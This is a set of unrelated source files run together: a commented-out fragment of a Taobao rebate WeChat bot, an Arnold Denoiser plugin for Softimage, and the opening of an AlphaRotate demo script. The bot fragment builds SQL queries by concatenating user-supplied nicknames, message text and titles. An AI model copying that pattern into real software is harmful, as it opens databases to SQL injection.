# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res3 = self.get_url(url3, headers3)
# self.logger.debug("{},{},{}".format(res3.url, res3.status_code, res3.history))
# r_url = res3.url
#
# return r_url
#
# def get_order(self, bot, msg, orderId, userInfo, puid, raw):
#
# timestr = str(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
# order_id = int(orderId)
#
# cm = ConnectMysql()
#
# check_order_sql = "SELECT * FROM taojin_order WHERE order_id='" + str(order_id) + "' AND bot_puid = '" +bot.self.puid+ "';"
# check_order_res = cm.ExecQuery(check_order_sql)
#
# # 判断该订单是否已经提现
# if len(check_order_res) >= 1:
# cm.Close()
# sendtext ='''
# 一一一一 订单消息 一一一一
#
# 订单【%s】提交成功,请勿重复提交
# ''' % (msg['Text'])
# return sendtext
#
# cm.ExecNonQuery("INSERT INTO taojin_order(wx_bot, username, order_id, completion_time, order_source, puid, bot_puid, status) VALUES('"+ bot.self.nick_name +"', '"+str(userInfo['NickName'])+"', '"+str(order_id)+"', '" + str(timestr) + "', '1', '"+ puid +"', '"+ bot.self.puid +"', '1')")
#
# send_text ='''
# 一一一一 订单消息 一一一一
#
# 订单【%s】提交成功,请耐心等待订单结算
# 结算成功后机器人将自动返利到您个人账户
#
# ''' % (order_id)
# return send_text
#
# def changeInfo(self, bot, msg, info, order_id, userInfo, timestr, puid, raw):
# try:
# cm = ConnectMysql()
#
# # 查询用户是否有上线
# check_user_sql = "SELECT * FROM taojin_user_info WHERE puid='" + puid + "' AND bot_puid='"+ bot.self.puid +"';"
# check_user_res = cm.ExecQuery(check_user_sql)
#
# # 判断是否已经有个人账户,没有返回信息
# if len(check_user_res) < 1:
# cm.Close()
# return {"info":"not_info"}
# else:
#
# # 获取商品查询记录
# get_query_sql = "SELECT * FROM taojin_query_record WHERE good_title='" + info['auctionTitle'] + "'AND puid='" + puid + "' AND bot_puid='"+ bot.self.puid +"' ORDER BY create_time LIMIT 1;"
#
# get_query_info = cm.ExecQuery(get_query_sql)
#
# if get_query_info == ():
# user_text = '''
# 一一一一订单信息一一一一
#
# 返利失败,订单信息有误
#
# '''
# return {'info': 'not_order', 'user_text': user_text}
#
# # 定义SQL语句 查询用户是否已经存在邀请人
# # 判断是否已经有邀请人了
# if check_user_res and check_user_res[0][17] != '0':
#
# # 获取邀请人信息
# get_parent_sql = "SELECT * FROM taojin_user_info WHERE lnivt_code='" + str(check_user_res[0][17]) + "' AND bot_puid='"+ bot.self.puid +"';"
#
# get_parent_info = cm.ExecQuery(get_parent_sql)
#
# # 计算返佣
# add_balance = round(float(info['feeString']) * float(config.get('BN', 'bn3t')), 2)
# # 累加余额
# withdrawals_amount = round(float(check_user_res[0][9]) + add_balance, 2)
# # 累加淘宝总返利
# taobao_rebate_amount = round(float(check_user_res[0][8]) + add_balance, 2)
# # 累加总返利
# total_rebate_amount = round(float(check_user_res[0][6]) + add_balance, 2)
#
# jishen = (float(get_query_info[0][4]) - float(info['realPayFeeString']))
#
# if jishen < 0:
# jishen = 0
#
# # 计算共节省金额,商品原价减去实际支付价格,加上原有节省金额加上返佣
# save_money = round(check_user_res[0][10] + jishen + add_balance, 2)
# # 总订单数加一
# total_order_num = int(check_user_res[0][11]) + 1
# # 淘宝订单数加一
# taobao_order_num = int(check_user_res[0][13]) + 1
#
# # 邀请人返利金额
# add_parent_balance = round(float(info['feeString']) * float(config.get('BN', 'bn4')), 2)
#
# # 给邀请人好友返利加上金额
# friends_rebatr = float(get_parent_info[0][19]) + float(add_balance)
# # 邀请人总钱数加上返利金额
# withdrawals_amount2 = round(float(get_parent_info[0][9]) + float(add_balance) * float(config.get('BN', 'bn4')), 2)
#
# cm.ExecNonQuery("UPDATE taojin_user_info SET withdrawals_amount='" + str(withdrawals_amount) + "', save_money='"+ str(save_money) +"', taobao_rebate_amount='"+ str(taobao_rebate_amount) +"', total_rebate_amount='"+ str(total_rebate_amount) +"', order_quantity='"+str(total_order_num)+"', taobao_order_quantity='"+str(taobao_order_num)+"', update_time='"+str(time.time())+"' WHERE puid='" + puid + "' AND bot_puid='"+ bot.self.puid +"';")
# cm.ExecNonQuery("UPDATE taojin_user_info SET withdrawals_amount='" + str(withdrawals_amount2) + "', friends_rebate='"+str(friends_rebatr)+"', update_time='"+str(time.time())+"' WHERE lnivt_code='" + str(check_user_res[0][17]) + "' AND bot_puid='"+ bot.self.puid +"';")
#
# select_order_num = "SELECT * FROM taojin_order WHERE puid='"+puid+"' AND bot_puid='"+bot.self.puid+"'"
# # 订单已完成,修改备注
# order_num = cm.ExecQuery(select_order_num)
#
# if order_num == ():
# split_arr = raw.sender.remark_name.split('_')
# new_remark_name = '%s%s%s%s%s%s%s' % (split_arr[0], '_', split_arr[1], '_', 'C', '_', split_arr[3])
# bot.core.set_alias(userName=raw.sender.user_name, alias=new_remark_name)
#
# cm.ExecNonQuery("UPDATE taojin_user_info SET remarkname = '"+new_remark_name+"' WHERE puid='" + puid + "' AND bot_puid='" + bot.self.puid + "'")
#
# cm.ExecNonQuery("INSERT INTO taojin_order(wx_bot, username, order_id, completion_time, order_source, puid, bot_puid) VALUES('"+ bot.self.nick_name +"', '"+str(userInfo['NickName'])+"', '"+str(order_id)+"', '" + str(timestr) + "', '2', '"+ puid +"', '"+ bot.self.puid +"')")
#
# # 累计订单数量
# order_nums = cm.ExecQuery(select_order_num)
#
# split_arr2 = raw.sender.remark_name.split('_')
#
# new_remark_name2 = '%s%s%s%s%s%s%s' % (split_arr2[0], '_', split_arr2[1], '_', split_arr2[2], '_', len(order_nums))
#
# bot.core.set_alias(userName=raw.sender.user_name, alias=new_remark_name2)
#
# cm.ExecNonQuery("UPDATE taojin_user_info SET remarkname = '"+new_remark_name2+"' WHERE puid='" + puid + "' AND bot_puid='" + bot.self.puid + "'")
#
# args = {
# 'wx_bot': bot.self.nick_name,
# 'bot_puid': bot.self.puid,
# 'username': check_user_res[0][4],
# 'puid': puid,
# 'rebate_amount': add_balance,
# 'type': 3,
# 'create_time': time.time()
# }
#
#
# # 写入返利日志
# cm.InsertRebateLog(args)
# parent_puid = self.ort.getPuid(bot, get_parent_info[0][4])
# args2 = {
# 'wx_bot': bot.self.nick_name,
# 'bot_puid': bot.self.puid,
# 'username': get_parent_info[0][4],
# 'puid': parent_puid,
# 'rebate_amount': add_parent_balance,
# 'type': 4,
# 'create_time': time.time()
# }
#
#
# # 写入返利日志
# cm.InsertRebateLog(args2)
#
# parent_user_text = '''
# 一一一一 推广信息 一一一一
#
# 您的好友【%s】又完成了一笔订单
# 返利提成%s元已发放到您个人账户
# 回复【个人信息】可查询账户信息
# ''' % (check_user_res[0][4], add_parent_balance)
#
# user_text = '''
# 一一一一系统消息一一一一
#
# 订单【%s】已完成
# 返利金%s元已发放到您的个人账户
# 回复【个人信息】可查询账户信息
# 回复【提现】可申请账户余额提现
# ''' % (order_id, add_balance)
# cm.Close()
# return {'parent_user_text': parent_user_text, 'user_text': user_text, 'info': 'success', 'parent': get_parent_info[0][4]}
# else:
# add_balance = round(float(info['feeString']) * float(config.get('BN', 'bn3t')), 2)
# withdrawals_amount = round(float(check_user_res[0][9]) + add_balance, 2)
# taobao_rebate_amount = round(float(check_user_res[0][8]) + add_balance, 2)
# total_rebate_amount = round(float(check_user_res[0][6]) + add_balance, 2)
#
# jishen = (float(get_query_info[0][4]) - float(info['realPayFeeString']))
#
# if jishen < 0:
# jishen = 0
#
# save_money = round(check_user_res[0][10] + (float(get_query_info[0][4]) - float(info['realPayFeeString'])) + add_balance, 2)
# total_order_num = int(check_user_res[0][11]) + 1
# taobao_order_num = int(check_user_res[0][13]) + 1
#
# cm.ExecNonQuery("UPDATE taojin_user_info SET withdrawals_amount='" + str(
# withdrawals_amount) + "', save_money='" + str(save_money) + "', taobao_rebate_amount='" + str(
# taobao_rebate_amount) + "', total_rebate_amount='" + str(
# total_rebate_amount) + "', order_quantity='"+str(total_order_num)+"', taobao_order_quantity='"+str(taobao_order_num)+"', update_time='" + str(time.time()) + "' WHERE puid='" + puid + "' AND bot_puid='"+ bot.self.puid +"';")
#
#
# select_order_num = "SELECT * FROM taojin_order WHERE puid='"+puid+"' AND bot_puid='"+bot.self.puid+"'"
# # Order completed, update the remark name
# order_num = cm.ExecQuery(select_order_num)
#
# if order_num == ():
# split_arr = raw.sender.remark_name.split('_')
# new_remark_name = '%s%s%s%s%s%s%s' % (split_arr[0], '_', split_arr[1], '_', 'C', '_', split_arr[3])
# self.logger.debug(new_remark_name)
# bot.core.set_alias(userName=raw.sender.user_name, alias=new_remark_name)
#
# cm.ExecNonQuery("UPDATE taojin_user_info SET remarkname = '"+new_remark_name+"' WHERE puid='" + puid + "' AND bot_puid='" + bot.self.puid + "'")
#
# cm.ExecNonQuery("INSERT INTO taojin_order(wx_bot, username, order_id, completion_time, order_source, puid, bot_puid) VALUES('"+ bot.self.nick_name+"', '"+str(userInfo['NickName'])+"', '"+str(order_id)+"', '" + str(timestr) + "', '2', '"+puid+"', '"+bot.self.puid+"')")
#
# # Accumulated order count
# order_nums = cm.ExecQuery(select_order_num)
#
# split_arr2 = raw.sender.remark_name.split('_')
#
# new_remark_name2 = '%s%s%s%s%s%s%s' % (split_arr2[0], '_', split_arr2[1], '_', split_arr2[2], '_', len(order_nums))
#
# bot.core.set_alias(userName=raw.sender.user_name, alias=new_remark_name2)
#
# cm.ExecNonQuery("UPDATE taojin_user_info SET remarkname = '"+new_remark_name2+"' WHERE puid='" + puid + "' AND bot_puid='" + bot.self.puid + "'")
#
# args = {
# 'wx_bot': bot.self.nick_name,
# 'bot_puid': bot.self.puid,
# 'username': check_user_res[0][4],
# 'puid': puid,
# 'rebate_amount': add_balance,
# 'type': 3,
# 'create_time': time.time()
# }
#
#
# # Write a rebate log entry
# cm.InsertRebateLog(args)
#
# user_text = '''
# 一一一一系统消息一一一一
#
# 订单【%s】已完成
# 返利金%s元已发放到您的个人账户
# 回复【个人信息】可查询账户信息
# 回复【提现】可申请账户余额提现
# ''' % (order_id, add_balance)
# cm.Close()
# return {'user_text': user_text, 'info': 'not_parent_and_success'}
# except Exception as e:
# trace = traceback.format_exc()
# self.logger.warning("error:{},trace:{}".format(str(e), trace))
# return {'info': 'feild'}
#
# # Periodically fetch Taobao order information
# def getOrderInfo(self, bot):
# self.load_cookies()
#
# endTime = time.strftime('%Y-%m-%d', time.localtime(time.time()))
#
# startTime = str((datetime.date.today() - datetime.timedelta(days=1)))
#
# t = str(round(time.time()))
#
# url = "http://pub.alimama.com/report/getTbkPaymentDetails.json?startTime="+startTime+"&endTime="+endTime+"&payStatus=3&queryType=1&toPage=1&perPageSize=50&total=&t="+t+"&pvid=&_tb_token_=f8b388e3f3e37&_input_charset=utf-8"
#
# headers = {
# "Accept": "application/json, text/javascript, */*; q=0.01",
# "Accept-Encoding": "gzip, deflate",
# "Accept-Language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7",
# "Cache-Control": "no-cache",
# "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
# "Host": "pub.alimama.com",
# "Pragma": "no-cache",
# "Referer": "http://pub.alimama.com/myunion.htm?spm=a219t.7900221/1.a214tr8.2.3d7c75a560ieiE",
# "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0",
# "X-Requested-With": "XMLHttpRequest"
# }
#
# while True:
# # interval of 3 hours
# time.sleep(10)
# try:
# # request the order API
# res = self.get_url(url, headers)
# # convert the response format
# res_dict = json.loads(res.text)
# except Exception as e:
# self.logger.debug(e)
# return e
#
# if __name__ == '__main__':
# al = Alimama()
# # al.login()
# # q = u'现货 RS版 树莓派3代B型 Raspberry Pi 3B 板载wifi和蓝牙'
# # q = u'蔻斯汀玫瑰身体护理套装沐浴露身体乳爽肤水滋润全身保湿补水正品'
# # q = u'DIY个性定制T恤 定做工作服短袖 男女夏季纯棉广告文化衫Polo印制'
# q = u'防晒衣女2017女装夏装新款印花沙滩防晒服薄中长款大码白色短外套'
# # res = al.get_detail(q)
# # auctionid = res['auctionId']
# # al.get_tk_link(auctionid)
# # url = 'http://c.b1wt.com/h.SQwr1X?cv=kzU8ZvbiEa8&sm=796feb'
# # al.get_real_url(url)
# # url = 'http://c.b1wt.com/h.S9fQZb?cv=zcNtZvbH4ak&sm=79e4be'
# # al.get_real_url(url)
# # url = 'http://c.b1wt.com/h.S9gdyy?cv=RW5EZvbuYBw&sm=231894'
# # al.get_real_url(url)
# # url = 'http://c.b1wt.com/h.S8ppn7?cv=ObUrZvZ3oH9&sm=1b02f8'
# # al.get_real_url(url)
# # url = 'http://c.b1wt.com/h.SQ70kv?cv=L5HpZv0w4hJ'
# # url = 'http://c.b1wt.com/h.S9A0pK?cv=8grnZvYkU14&sm=efb5b7'
# url = 'http://zmnxbc.com/s/nlO3j?tm=95b078'
# al.get_real_url(url)
|
ArnoldDenoiser.py
|
"""************************************************************************************************************************************
Copyright 2017 Autodesk, Inc. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
************************************************************************************************************************************"""
# Arnold Denoiser
# Initial code generated by Softimage SDK Wizard
# Executed Tue Dec 11 19:48:36 UTC+0100 2018 by Jens Lindgren
import win32com.client
from win32com.client import constants as C
import glob
import os
import re
import subprocess
import sys
import threading
from time import sleep
null = None
false = 0
true = 1
# startupinfo to prevent Windows processes from displaying a console window
if sys.platform == 'win32':
_no_window = subprocess.STARTUPINFO()
_no_window.dwFlags |= subprocess.STARTF_USESHOWWINDOW
else:
_no_window = None
def XSILoadPlugin( in_reg ):
if Application.plugins('Arnold Tools') is None:
Application.LoadPlugin(XSIUtils.BuildPath(in_reg.OriginPath, 'ArnoldTools.js'))
h = Application.SItoAToolHelper()
h.SetPluginInfo(in_reg, 'Arnold Denoiser')
in_reg.RegisterCommand('OpenDenoiserProperty', 'SITOA_OpenDenoiserProperty')
in_reg.RegisterProperty('arnold_denoiser')
#RegistrationInsertionPoint - do not remove this line
return true
def XSIUnloadPlugin( in_reg ):
return true
def OpenDenoiserProperty_Init( in_ctxt ):
oCmd = in_ctxt.Source
oArgs = oCmd.Arguments
oArgs.Add("in_pass")
oArgs.Add("in_inspect")
return true
def OpenDenoiserProperty_Execute(in_pass, in_inspect):
inspect = True if in_inspect is None else in_inspect
# default to currentpass
obj = Application.ActiveProject.ActiveScene.ActivePass
if in_pass:
if not in_pass.IsEqualTo(Application.ActiveProject.ActiveScene.PassContainer):
# if Arnold Render Options is Local in the Pass where the button was pressed, use that instead of currentpass
obj = in_pass
propCollection = obj.Properties
prop = propCollection.Find('arnold_denoiser')
if not prop:
prop = obj.AddProperty("arnold_denoiser", false, "Arnold Denoiser")
if inspect:
Application.InspectObj(prop)
return prop
def arnold_denoiser_Define( in_ctxt ):
cp = in_ctxt.Source
cp.AddParameter2('input', C.siString, '', None, None, None, None, C.siClassifUnknown, C.siPersistable)
cp.AddParameter2('output_suffix', C.siString, '_denoised', None, None, None, None, C.siClassifUnknown, C.siPersistable)
cp.AddParameter2('output', C.siString, '', None, None, None, None, C.siClassifUnknown, C.siReadOnly)
cp.AddParameter2('frame_range', C.siString, 'Complete Sequence', None, None, None, None, C.siClassifUnknown, C.siPersistable)
cp.AddParameter2('start_frame', C.siInt4, 0, 0, 2147483647, 0, 100, C.siClassifUnknown, C.siPersistable)
cp.AddParameter2('end_frame', C.siInt4, 0, 0, 2147483647, 0, 100, C.siClassifUnknown, C.siPersistable)
cp.AddParameter2('temporal_frames', C.siInt4, 0, 0, 2, 0, 2, C.siClassifUnknown, C.siPersistable)
cp.AddParameter2('variance', C.siFloat, 0.5, 0, 1, 0, 1, C.siClassifUnknown, C.siPersistable)
cp.AddParameter2('pixel_search_radius', C.siInt4, 9, 6, 21, 6, 21, C.siClassifUnknown, C.siPersistable)
cp.AddParameter2('pixel_patch_radius', C.siInt4, 3, 0, 6, 0, 6, C.siClassifUnknown, C.siPersistable)
cp.AddParameter2('light_group_aovs', C.siString, '', None, None, None, None, C.siClassifUnknown, C.siPersistable)
return true
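# These parameters are turned into the noice command-line flags assembled in denoiseImage() below:
# temporal_frames -> -ef, pixel_search_radius -> -sr, pixel_patch_radius -> -pr, variance -> -v,
# and each space-separated name in light_group_aovs -> its own -l argument.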
# Tip: Use the "Refresh" option on the Property Page context menu to
# reload your script changes and re-execute the DefineLayout callback.
def arnold_denoiser_DefineLayout( in_ctxt ):
layout = in_ctxt.Source
layout.Clear()
file_types = 'OpenEXR files (*.exr)|*.exr||'
item = layout.AddItem('input', 'Input', C.siControlFilePath)
item.SetAttribute(C.siUIFileFilter, file_types)
item.SetAttribute(C.siUIOpenFile, True)
item.SetAttribute(C.siUIFileMustExist, True)
item.SetAttribute(C.siUILabelMinPixels, 40)
item.SetAttribute(C.siUILabelPercentage, 20)
item = layout.AddItem('output_suffix', 'Output Suffix')
item.SetAttribute(C.siUILabelMinPixels, 80)
item = layout.AddItem('output', 'Output')
item.SetAttribute(C.siUILabelMinPixels, 40)
item.SetAttribute(C.siUILabelPercentage, 20)
frame_ranges = [
'Single Frame', 'Single Frame',
'Start / End', 'Start / End',
'Complete Sequence', 'Complete Sequence'
]
item = layout.AddEnumControl('frame_range', frame_ranges, 'Frame Range')
item.SetAttribute(C.siUILabelMinPixels, 80)
layout.AddRow()
layout.AddItem('start_frame', 'Start Frame')
layout.AddItem('end_frame', 'End Frame')
layout.EndRow()
item = layout.AddItem('temporal_frames', 'Temporal Stability Frames')
item.SetAttribute(C.siUILabelMinPixels, 140)
item = layout.AddItem('variance', 'Variance')
item.SetAttribute(C.siUILabelMinPixels, 140)
item = layout.AddItem('pixel_search_radius', 'Pixel Search Radius')
item.SetAttribute(C.siUILabelMinPixels, 140)
item = layout.AddItem('pixel_patch_radius', 'Pixel Patch Radius')
item.SetAttribute(C.siUILabelMinPixels, 140)
item = layout.AddItem('light_group_aovs', 'Light Group AOVs')
item.SetAttribute(C.siUILabelMinPixels, 100)
item = layout.AddButton('denoise', 'Denoise')
item.SetAttribute(C.siUICX, 80)
item.SetAttribute(C.siUICY, 30)
return true
def arnold_denoiser_OnInit( ):
Application.LogMessage('arnold_denoiser_OnInit called', C.siVerbose)
input_logic()
frame_range_logic()
def arnold_denoiser_OnClosed( ):
Application.LogMessage('arnold_denoiser_OnClosed called', C.siVerbose)
def arnold_denoiser_input_OnChanged( ):
Application.LogMessage('arnold_denoiser_input_OnChanged called', C.siVerbose)
oParam = PPG.input
paramVal = oParam.Value
Application.LogMessage(str('New value: ') + str(paramVal), C.siVerbose)
input_logic()
def arnold_denoiser_output_suffix_OnChanged( ):
Application.LogMessage('arnold_denoiser_output_suffix_OnChanged called', C.siVerbose)
oParam = PPG.output_suffix
paramVal = oParam.Value
Application.LogMessage(str('New value: ') + str(paramVal), C.siVerbose)
input_logic()
def arnold_denoiser_frame_range_OnChanged( ):
Application.LogMessage('arnold_denoiser_frame_range_OnChanged called', C.siVerbose)
oParam = PPG.frame_range
paramVal = oParam.Value
Application.LogMessage(str('New value: ') + str(paramVal), C.siVerbose)
frame_range_logic()
def arnold_denoiser_denoise_OnClicked( ):
Application.LogMessage('arnold_denoiser_denoise_OnClicked called', C.siVerbose)
cp = PPG.Inspected(0)
doDenoise(cp)
def frame_range_logic():
if PPG.frame_range.Value == 'Start / End':
PPG.start_frame.Enable(True)
PPG.end_frame.Enable(True)
elif PPG.frame_range.Value == 'Single Frame':
PPG.start_frame.Enable(True)
PPG.end_frame.Enable(False)
else:
PPG.start_frame.Enable(False)
PPG.end_frame.Enable(False)
def input_logic():
# convert Softimage file sequence syntax
inputFile = PPG.input.Value
if inputFile:
inputSeq = ImageSequence(inputFile)
start_frame = inputSeq.start
end_frame = inputSeq.end
PPG.start_frame.Value = start_frame
PPG.end_frame.Value = end_frame
outputSuffix = PPG.output_suffix.Value
outputSeq = ImageSequence(inputFile)
outputSeq.addFilebaseSuffix(outputSuffix)
PPG.output.Value = outputSeq.si()
else:
PPG.start_frame.Value = 0
PPG.end_frame.Value = 0
PPG.output.Value = ''
def SITOALogMessage(message, severity=C.siInfo):
loglevel = Application.GetValue("Passes.Arnold_Render_Options.log_level")
siloglevel = [C.siError, C.siWarning, C.siInfo, C.siVerbose][loglevel] # select the Softimage severity from SItoA loglevel.
if severity <= siloglevel:
# LogMessage but clamp severity at siInfo
# This makes sure that siVerbose messages get printed regardless of whether verbosity is enabled in Softimage or not
Application.LogMessage(message, min(severity, C.siInfo))
class ImageSequence(object):
si_re = re.compile(r'(.*)\[(\d+)\.{2}(\d+)(?:;(\d+))?\](.*)(\..+)')
square_re = re.compile(r'(.*?)(#+)(.*)(\..+)')
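# Illustrative examples of the path styles these patterns are meant to match (file names are hypothetical):
#   si_re     : u'beauty.[1..240;4].exr'  -> filebase, start, end, optional padding, filehead, extension
#   square_re : u'beauty.####.exr'        -> padding taken from the number of '#' characters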
def __init__(self, path=None):
# Class that makes conversions between the different image sequence path notations.
self.start = 0
self.end = 0
self.padding = Application.GetValue("Passes.RenderOptions.FramePadding")
self.filebase = u''
self.filehead = u''
self.ext = u''
self._creation_path = None
if path is not None:
self._creation_path = path
if self.si_re.match(path):
self.parseSiSequence()
elif self.square_re.match(path):
self.parseSquareSequence()
else:
self.parseDigitSequence()
def __repr__(self):
return 'ImageSequence(start={}, end={}, padding={}, filebase={}, filehead={}, ext={})'.format(
self.start,
self.end,
self.padding,
self.filebase,
self.filehead,
self.ext
)
def parseSiSequence(self):
re_result = self.si_re.search(self._creation_path)
padding = re_result.group(4)
if padding is None:
self.padding = 1
else:
self.padding = int(padding)
self.start = int(re_result.group(2))
self.end = int(re_result.group(3))
self.filebase = re_result.group(1)
self.filehead = re_result.group(5)
self.ext = re_result.group(6)
def parseSquareSequence(self):
re_result = self.square_re.search(self._creation_path)
self.padding = len(re_result.group(2))
self.filebase = re_result.group(1)
self.filehead = re_result.group(3)
self.ext = re_result.group(4)
begin_pos = len(self.filebase)
end_pos = begin_pos + self.padding
end_frame = start_frame = 0
globFile = self.filebase + u'[0-9]' * self.padding + self.filehead + self.ext
filesList = glob.glob(globFile) or []
for matchingFile in filesList:
frame_token = int(matchingFile[begin_pos:end_pos])
if start_frame <= 0 or frame_token < start_frame:
start_frame = frame_token
if frame_token > end_frame:
end_frame = frame_token
self.start = start_frame
self.end = end_frame
def parseDigitSequence(self):
base, ext = os.path.splitext(self._creation_path)
head_length = 0
padding = 0
for c in reversed(base):
if u'0' <= c <= u'9':
padding += 1
elif padding > 0:
break # I already found numerical characters and they're finished now
elif c == os.sep:
break # don't search folders
else:
# still haven't found a numerical parameter
head_length += 1
if padding > 0:
if head_length > 0:
self.start = int(base[-(head_length+padding):-head_length])
self.filehead = base[-head_length:]
else:
self.start = int(base[-(head_length+padding):])
self.filehead = u''
self.end = self.start
self.padding = padding
self.filebase = base[:-(head_length+padding)]
self.ext = ext
else:
self.padding = 0
self.filebase = base
self.ext = ext
def si(self):
if self.start == self.end:
# if start = end, return the single frame
return self.frame(self.start)
if self.padding > 1:
return u'{}[{}..{};{}]{}{}'.format(self.filebase, self.start, self.end, self.padding, self.filehead, self.ext)
else:
return u'{}[{}..{}]{}{}'.format(self.filebase, self.start, self.end, self.filehead, self.ext)
def squares(self):
if self.start == self.end:
# if start = end, return the single frame
return self.frame(self.start)
return (u'{}' + u'#' * max(self.padding, 1) + '{}{}').format(self.filebase, self.filehead, self.ext)
def frame(self, frame):
if self.padding > 0:
return (u'{}{:0' + str(self.padding) + u'd}{}{}').format(self.filebase, frame, self.filehead, self.ext)
else:
return (self.filebase + self.filehead + self.ext)
def addFilebaseSuffix(self, suffix):
if self.filebase[-1] in u'._':
new_filebase = self.filebase[:-1]
new_filebase += suffix
new_filebase += self.filebase[-1:]
else:
new_filebase = self.filebase + suffix
self.filebase = new_filebase
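# A minimal usage sketch of ImageSequence (paths and frame numbers are illustrative only):
#   seq = ImageSequence(u'C:/renders/beauty.[1..240;4].exr')
#   seq.frame(5)    ->  u'C:/renders/beauty.0005.exr'
#   seq.squares()   ->  u'C:/renders/beauty.####.exr'
#   seq.addFilebaseSuffix('_denoised'); seq.si()  ->  u'C:/renders/beauty_denoised.[1..240;4].exr'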
def doDenoise(cp):
inFileStr = cp.input.Value
outputSuffix = cp.output_suffix.Value
if inFileStr == '':
XSIUIToolkit.MsgBox('An input file must be selected', C.siMsgOkOnly, 'Arnold Denoiser')
return False
if outputSuffix == '':
XSIUIToolkit.MsgBox('Output suffix can\'t be empty', C.siMsgOkOnly, 'Arnold Denoiser')
return False
inFileStr = XSIUtils.Linktab.ResolvePath(inFileStr)
inSeq = ImageSequence(inFileStr)
outSeq = ImageSequence(inFileStr)
outSeq.addFilebaseSuffix(outputSuffix)
start_frame = cp.start_frame.Value
frame_range = cp.frame_range.Value
if frame_range == u'Single Frame':
end_frame = start_frame
elif frame_range == u'Start / End':
end_frame = cp.end_frame.Value
if end_frame < start_frame:
XSIUIToolkit.MsgBox('End Frame can\'t be before Start Frame', C.siMsgOkOnly, 'Arnold Denoiser')
return False
else: # complete sequence, need to check on disk all the existing input files
start_frame, end_frame = inSeq.start, inSeq.end
temporal_frames = cp.temporal_frames.Value
pixel_search_radius = cp.pixel_search_radius.Value
pixel_patch_radius = cp.pixel_patch_radius.Value
variance = cp.variance.Value
light_group_aovs = cp.light_group_aovs.Value
runDenoise(start_frame, end_frame, inSeq, outSeq, temporal_frames, pixel_search_radius, pixel_patch_radius, variance, light_group_aovs)
return True
def runDenoise(start_frame, end_frame, inSeq, outSeq, temporal_frames, pixel_search_radius, pixel_patch_radius, variance, light_group_aovs):
pb = XSIUIToolkit.ProgressBar
pb.Caption = 'Denoising ...'
pb.Maximum = int(end_frame) - int(start_frame) + 1
pb.Visible = True
pb.StatusText = '{}/{}'.format(0, pb.Maximum)
run = True
f = start_frame
while run and f <= end_frame:
inFile = inSeq.frame(f)
outFile = outSeq.frame(f)
if os.path.isfile(inFile):
SITOALogMessage('[sitoa] Denoising image {} '.format(inFile))
t = threading.Thread(target=denoiseImage, args=(inFile, outFile, temporal_frames, pixel_search_radius, pixel_patch_radius, variance, light_group_aovs))
t.start()
while t.is_alive():
if pb.CancelPressed:
run = False
SITOALogMessage('[sitoa] Stopping Arnold Denoiser after the current frame is done...')
Application.Desktop.RedrawUI()
sleep(0.01) # just to limit the RedrawUI a bit.
else:
if not run:
SITOALogMessage('[sitoa] Arnold Denoiser has stopped.')
else:
SITOALogMessage('[sitoa] Arnold Denoiser: Could not find input file {} '.format(inFile), C.siError)
i = pb.Increment()
pb.StatusText = '{}/{}'.format(i, pb.Maximum)
f += 1
else:
if run:
SITOALogMessage('[sitoa] Arnold Denoiser has finished.')
def denoiseImage(inFile, outFile, temporal_frames, pixel_search_radius, pixel_patch_radius, variance, light_group_aovs):
noice_binary = os.path.join(os.path.dirname(Application.Plugins('Arnold Render').Filename), 'noice')
if sys.platform == 'win32':
noice_binary += '.exe'
cmd = [noice_binary]
cmd += ['-i', inFile, '-o', outFile]
cmd += ['-ef', str(temporal_frames), '-sr', str(pixel_search_radius), '-pr', str(pixel_patch_radius), '-v', str(variance)]
if len(light_group_aovs) > 0:
light_group_split = light_group_aovs.split(' ')
for light_group in light_group_split:
cmd += ['-l', light_group]
SITOALogMessage('[sitoa] Starting Arnold Denoiser with command: ' + subprocess.list2cmdline(cmd), C.siVerbose)
res = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, startupinfo=_no_window).communicate()[0]
SITOALogMessage(res, C.siVerbose)
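# For reference, with the property defaults above the assembled command looks roughly like this
# (file names are illustrative):
#   noice -i beauty.0001.exr -o beauty_denoised.0001.exr -ef 0 -sr 9 -pr 3 -v 0.5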
|
demo.py
|
# -*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import math
import os
from multiprocessing import Queue, Process
import cv2
import numpy as np
import tensorflow as tf
from alpharotate.libs.utils.coordinate_convert import forward_convert, backward_convert
from alpharotate.libs.utils.draw_box_in_img import DrawBox
from alpharotate.libs.utils.rotate_polygon_nms import rotate_gpu_nms
from tqdm import tqdm
from alpharotate.libs.label_name_dict.label_dict import LabelMap
from alpharotate.utils.pretrain_zoo import PretrainModelZoo
from alpharotate.utils import tools
def parse_args():
parser = argparse.ArgumentParser('Start testing.')
parser.add_argument('--test_dir', dest='test_dir',
help='evaluate imgs dir ',
default='/data/dataset/DOTA/test/images/', type=str)
parser.add_argument('--gpus', dest='gpus',
help='gpu id',
default='0,1,2,3,4,5,6,7', type=str)
parser.add_argument('--show_box', '-s', default=False,
action='store_true')
parser.add_argument('--multi_scale', '-ms', default=False,
action='store_true')
parser.add_argument('--flip_img', '-f', default=False,
action='store_true')
parser.add_argument('--num_imgs', dest='num_imgs',
help='test image number',
default=np.inf, type=int)
parser.add_argument('--h_len', dest='h_len',
help='image height',
default=1200, type=int)
parser.add_argument('--w_len', dest='w_len',
help='image width',
default=1200, type=int)
parser.add_argument('--h_overlap', dest='h_overlap',
help='height overlap',
default=50, type=int)
parser.add_argument('--w_overlap', dest='w_overlap',
help='width overlap',
default=50, type=int)
